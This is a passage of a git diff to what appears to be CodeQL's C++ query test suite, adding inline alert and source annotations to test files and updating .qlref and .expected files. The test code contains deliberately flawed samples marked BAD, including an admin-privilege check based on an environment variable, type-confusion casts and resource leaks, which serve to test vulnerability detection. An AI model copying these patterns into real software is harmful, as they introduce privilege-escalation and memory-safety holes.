*call to getenv | | test.cpp:24:10:24:35 | ! ... | semmle.label | ! ... | subpaths -#select -| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref index bb8c6c324a30..b12367abe280 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-807/TaintedCondition.ql \ No newline at end of file +query: Security/CWE/CWE-807/TaintedCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp index 641cbaa7be7d..2f7eaa12ccad 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/test.cpp @@ -17,11 +17,11 @@ const char *currentUser; void processRequest() { - const char *userName = getenv("USER_NAME"); + const char *userName = getenv("USER_NAME"); // $ Source // BAD: the condition is controllable by the user, and // the body of the if makes a security decision. - if (!strcmp(userName, "admin")) { + if (!strcmp(userName, "admin")) { // $ Alert adminPrivileges = 1; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref index cef3e6686eac..e734453a5d94 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/InfiniteLoopWithUnsatisfiableExitCondition.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-835/InfiniteLoopWithUnsatisfiableExitCondition.ql \ No newline at end of file +query: Security/CWE/CWE-835/InfiniteLoopWithUnsatisfiableExitCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp index 4ff375910036..7d6b3585df2d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-835/semmle/InfiniteLoopWithUnsatisfiableExitCondition/test.cpp @@ -5,7 +5,7 @@ void test00(int n) { } while (1) { // BAD: condition is never true, so loop will not terminate. - if (i == n) { + if (i == n) { // $ Alert break; } } @@ -18,7 +18,7 @@ void test01(int n) { } for (;;) { // BAD: condition is never true, so loop will not terminate. - if (i == n) { + if (i == n) { // $ Alert break; } } @@ -59,7 +59,7 @@ int test05() { int result = 0; // BAD: loop condition is always true. - for (i = 0; i >= 0; i = (i + 1) % 256) + for (i = 0; i >= 0; i = (i + 1) % 256) // $ Alert { result++; } @@ -108,7 +108,7 @@ void test08(int n) { for (i = 0;;) { // BAD: condition is never true, so loop will not terminate. - if (i == n) { + if (i == n) { // $ Alert break; } @@ -124,7 +124,7 @@ void test09(char *str) { { c = *(str++); - if (c < 'a' && c > 'z') // BAD: this condition is always false. + if (c < 'a' && c > 'z') // BAD: this condition is always false. // $ Alert return; } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected index 6e18306bcd29..a805d06e1e22 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected @@ -1,3 +1,13 @@ +#select +| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | +| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | +| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | +| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | +| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | +| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | +| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | +| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | +| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | edges | test.cpp:17:13:17:18 | new | test.cpp:17:13:17:18 | new | provenance | | | test.cpp:17:13:17:18 | new | test.cpp:18:21:18:47 | p | provenance | | @@ -104,13 +114,3 @@ nodes | test.cpp:226:13:226:18 | new | semmle.label | new | | test.cpp:227:29:227:63 | p | semmle.label | p | subpaths -#select -| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | -| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | -| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | -| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | -| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | -| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | -| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | -| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | -| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref index 53b17f1e1fda..b0034e45821a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-843/TypeConfusion.ql \ No newline at end of file +query: Security/CWE/CWE-843/TypeConfusion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp index 982496218ffa..00f56700d55a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp @@ -24,13 +24,13 @@ void test2() { } void test3() { - void* p = new S1; - Not_S1_wrapper* s1w = static_cast(p); // BAD + void* p = new S1; // $ Source + Not_S1_wrapper* s1w = static_cast(p); // BAD // $ Alert } void test4() { - void* p = new Not_S1_wrapper; - S1* s1 = static_cast(p); // BAD + void* p = new Not_S1_wrapper; // $ Source + S1* s1 = static_cast(p); // BAD // $ Alert } struct HasBitFields { @@ -63,8 +63,8 @@ struct Dog : public Animal { }; void test6() { - Animal* a = new Cat; - Dog* d = static_cast(a); // BAD + Animal* a = new Cat; // $ Source + Dog* d = static_cast(a); // BAD // $ Alert } void test7() { @@ -124,8 +124,8 @@ struct Not_S2_prefix { }; void test11() { - S2* s2 = new S2; - Not_S2_prefix* s2p = reinterpret_cast(s2); // BAD + S2* s2 = new S2; // $ Source + Not_S2_prefix* s2p = reinterpret_cast(s2); // BAD // $ Alert } struct HasSomeBitFields { @@ -140,9 +140,9 @@ void test12() { S1* s1 = new S1; HasBitFields* hbf = reinterpret_cast(s1); // BAD [NOT DETECTED] - S1* s1_2 = new S1; + S1* s1_2 = new S1; // $ Source // This one has a non-bitfield members. So we detect the problem - HasSomeBitFields* hbf2 = reinterpret_cast(s1_2); // BAD + HasSomeBitFields* hbf2 = reinterpret_cast(s1_2); // BAD // $ Alert } void test13(bool b, Cat* c) { @@ -150,13 +150,13 @@ void test13(bool b, Cat* c) { if(b) { a = c; } else { - a = new Dog; + a = new Dog; // $ Source } // This FP happens despite the `not GoodFlow::flowTo(sinkNode)` condition in the query // because we don't find a flow path from `a = c` to `static_cast(a)` because // the "source" (i.e., `a = c`) doesn't have an allocation. if(b) { - Cat* d = static_cast(a); // GOOD [FALSE POSITIVE] + Cat* d = static_cast(a); // GOOD [FALSE POSITIVE] // $ Alert } } @@ -184,9 +184,9 @@ void test14() { struct UInt8_with_more { UInt8 u8; void* p; }; void test15() { - void* u64 = new UInt64; + void* u64 = new UInt64; // $ Source // ... - UInt8_with_more* u8 = (UInt8_with_more*)u64; // BAD + UInt8_with_more* u8 = (UInt8_with_more*)u64; // BAD // $ Alert } struct SingleInt { @@ -214,8 +214,8 @@ struct UnrelatedStructSize { }; void test17() { - void* p = new S1; - UnrelatedStructSize* uss = static_cast(p); // BAD + void* p = new S1; // $ Source + UnrelatedStructSize* uss = static_cast(p); // BAD // $ Alert } struct TooLargeBufferSize { @@ -223,8 +223,8 @@ struct TooLargeBufferSize { }; void test18() { - void* p = new S1; - TooLargeBufferSize* uss = static_cast(p); // BAD + void* p = new S1; // $ Source + TooLargeBufferSize* uss = static_cast(p); // BAD // $ Alert } // semmle-extractor-options: --gcc -std=c++11 \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref b/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref index b60eb7917224..d22b10044239 100644 --- a/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref +++ b/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref @@ -1 +1 @@ -Summary/LinesOfCode.ql +query: Summary/LinesOfCode.ql diff --git a/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref b/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref index baaa947e6afa..99a6d1324943 100644 --- a/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref +++ b/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref @@ -1 +1 @@ -Summary/LinesOfUserCode.ql +query: Summary/LinesOfUserCode.ql diff --git a/cpp/ql/test/query-tests/definitions/definitions.qlref b/cpp/ql/test/query-tests/definitions/definitions.qlref index 7b600c094b54..89fab02d1037 100644 --- a/cpp/ql/test/query-tests/definitions/definitions.qlref +++ b/cpp/ql/test/query-tests/definitions/definitions.qlref @@ -1 +1 @@ -definitions.ql +query: definitions.ql diff --git a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c index ff4e5ad15a47..1d63e5531a52 100644 --- a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c +++ b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c @@ -408,7 +408,7 @@ void justStillGood(int x) { justStillGood(199); } -void bad(int x) { +void bad(int x) { // $ Alert bad(2); bad(3); bad(4); diff --git a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref index e2fb899048e0..e3c6654bd843 100644 --- a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref +++ b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref @@ -1 +1,2 @@ -jsf/3.02 Code Size and Complexity/AV Rule 1.ql +query: jsf/3.02 Code Size and Complexity/AV Rule 1.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref index b3267de7b8a9..36002b9e0459 100644 --- a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref +++ b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref @@ -1 +1,2 @@ -jsf/4.04 Environment/AV Rule 13.ql +query: jsf/4.04 Environment/AV Rule 13.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp index cd11861c4ec6..4d87c501c8e8 100644 --- a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp @@ -2,9 +2,9 @@ int main() { const char *const_str = ""; - const wchar_t *const_wstr = L""; // BAD + const wchar_t *const_wstr = L""; // BAD // $ Alert char c = 'c'; - wchar_t wc = L'c'; // BAD + wchar_t wc = L'c'; // BAD // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref index 5ae78414335a..e06ec8cac8b6 100644 --- a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref +++ b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref @@ -1 +1,2 @@ -jsf/4.06 Pre-Processing Directives/AV Rule 32.ql +query: jsf/4.06 Pre-Processing Directives/AV Rule 32.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c index 1c4bb4a99133..21f16d449b6e 100644 --- a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c +++ b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c @@ -1,4 +1,4 @@ #include "test.H" // GOOD #include "test.xpm" // GOOD -#include "test2.c" // BAD +#include "test2.c" // BAD // $ Alert #include "test.def" // GOOD diff --git a/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref b/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref index 57b4d1283c7f..729eeaf1071f 100644 --- a/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref +++ b/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref @@ -1 +1 @@ -jsf/4.07 Header Files/AV Rule 35.ql +query: jsf/4.07 Header Files/AV Rule 35.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref index a39a710f34e2..e7c382bff878 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref @@ -1 +1,2 @@ -jsf/4.09 Style/AV Rule 53.1.ql +query: jsf/4.09 Style/AV Rule 53.1.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref index 285ffc692c76..10d7349f3073 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref @@ -1 +1 @@ -jsf/4.09 Style/AV Rule 53.ql +query: jsf/4.09 Style/AV Rule 53.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref index 5aae2758b1c9..813d3f75e641 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref @@ -1 +1 @@ -jsf/4.09 Style/AV Rule 54.ql +query: jsf/4.09 Style/AV Rule 54.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c index 47c2408c2fb9..1985c5ad67b8 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c @@ -1,4 +1,4 @@ #include "test" #include "test.abc" #include "test.H" -#include "test'.h" +#include "test'.h" // $ Alert[cpp/jsf/av-rule-53-1] diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp index bc21219cab82..dee5e477a80d 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp @@ -1,7 +1,7 @@ class MyClass1 { public: - MyClass1() { // BAD + MyClass1() { // BAD // $ Alert x = 1; } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref index 6ed93402c8b4..60e5fd779888 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 73.ql +query: jsf/4.10 Classes/AV Rule 73.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp index 5c86702e2c26..d0c823c22121 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp @@ -11,7 +11,7 @@ class Bad int cmp(const Bad& that); }; -Bad::Bad() : key(-1) // non-compliant +Bad::Bad() : key(-1) // non-compliant // $ Alert { } @@ -73,7 +73,7 @@ class AlsoGood char getChar(); }; -AlsoGood::AlsoGood() // compliant [FALSE POSITIVE] +AlsoGood::AlsoGood() // compliant [FALSE POSITIVE] // $ Alert { cp = 0; } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref index a878bda77997..d314f74ada73 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 76.ql +query: jsf/4.10 Classes/AV Rule 76.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp index 0c5e40e7b912..b90069862a29 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp @@ -2,7 +2,7 @@ class Class1 // good: no pointer members, default assignment operator and copy c { }; -class Class2 // bad: pointer members, default assignment operator and copy constructor +class Class2 // bad: pointer members, default assignment operator and copy constructor // $ Alert { private: int* _a; @@ -13,7 +13,7 @@ class Class2 // bad: pointer members, default assignment operator and copy const } }; -class Class3 // bad: pointer members, custom assignment operator and default copy constructor +class Class3 // bad: pointer members, custom assignment operator and default copy constructor // $ Alert { private: int* _a; @@ -30,7 +30,7 @@ class Class3 // bad: pointer members, custom assignment operator and default cop } }; -class Class4 // bad: pointer members, default assignment operator and custom copy constructor +class Class4 // bad: pointer members, default assignment operator and custom copy constructor // $ Alert { private: int* _a; diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref index 5fe2b71b701b..7ccb2e198843 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 77.1.ql +query: jsf/4.10 Classes/AV Rule 77.1.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp index e9e917c840fb..ceeb03948e8c 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp @@ -7,7 +7,7 @@ class C2 { }; class C3 { - C3(const C3& c, int i = 1); // error + C3(const C3& c, int i = 1); // error // $ Alert }; namespace templates { diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp index 7612ac07c8ce..e2b79ae37bf0 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp @@ -53,7 +53,7 @@ struct Base_Virtual_VirtualDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtor +struct Base_Virtual_NonVirtualDtor // $ Alert { ~Base_Virtual_NonVirtualDtor(); virtual void VirtualFunction(); @@ -65,7 +65,7 @@ struct Base_Virtual_ImplicitDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtorWithDefinition +struct Base_Virtual_NonVirtualDtorWithDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithDefinition(); virtual void VirtualFunction(); @@ -75,7 +75,7 @@ Base_Virtual_NonVirtualDtorWithDefinition::~Base_Virtual_NonVirtualDtorWithDefin { } -struct Base_Virtual_NonVirtualDtorWithInlineDefinition +struct Base_Virtual_NonVirtualDtorWithInlineDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithInlineDefinition() { diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref index 419d3f69cc58..6c416c54edfe 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 78.ql +query: jsf/4.10 Classes/AV Rule 78.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp index 6fb9815dd742..d2267748984d 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp @@ -43,23 +43,23 @@ class MyClass MyClass() { myPtr1 = new int; // GOOD - myPtr2 = new int; // BAD: not deleted in destructor + myPtr2 = new int; // BAD: not deleted in destructor // $ Alert myPtr3 = (int *)malloc(sizeof(int)); // GOOD - myPtr4 = (int *)malloc(sizeof(int)); // BAD: not freed in destructor - myPtr5 = new int; // BAD: deleted in close but not in destructor - myPtr6 = (int *)malloc(sizeof(int)); // BAD: freed in close but not in destructor + myPtr4 = (int *)malloc(sizeof(int)); // BAD: not freed in destructor // $ Alert + myPtr5 = new int; // BAD: deleted in close but not in destructor // $ Alert + myPtr6 = (int *)malloc(sizeof(int)); // BAD: freed in close but not in destructor // $ Alert myAutoPtr = new int; // GOOD myFile1 = fopen("file1.txt", "rt"); // GOOD - myFile2 = fopen("file2.txt", "rt"); // BAD: not closed in destructor + myFile2 = fopen("file2.txt", "rt"); // BAD: not closed in destructor // $ Alert - myArray1 = (int *)calloc(100, sizeof(int)); // BAD: not freed in destructor - myArray2 = new int[100]; // BAD: not deleted in destructor + myArray1 = (int *)calloc(100, sizeof(int)); // BAD: not freed in destructor // $ Alert + myArray2 = new int[100]; // BAD: not deleted in destructor // $ Alert myArray3 = new int[100]; // GOOD: deleted in destructor myPtr7 = (int*)realloc(0, sizeof(int)); // GOOD: freed below (assuming the realloc succeeds) - myPtr8 = (int*)realloc(myPtr7, sizeof(int)); // BAD: not freed in destructor + myPtr8 = (int*)realloc(myPtr7, sizeof(int)); // BAD: not freed in destructor // $ Alert } ~MyClass() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 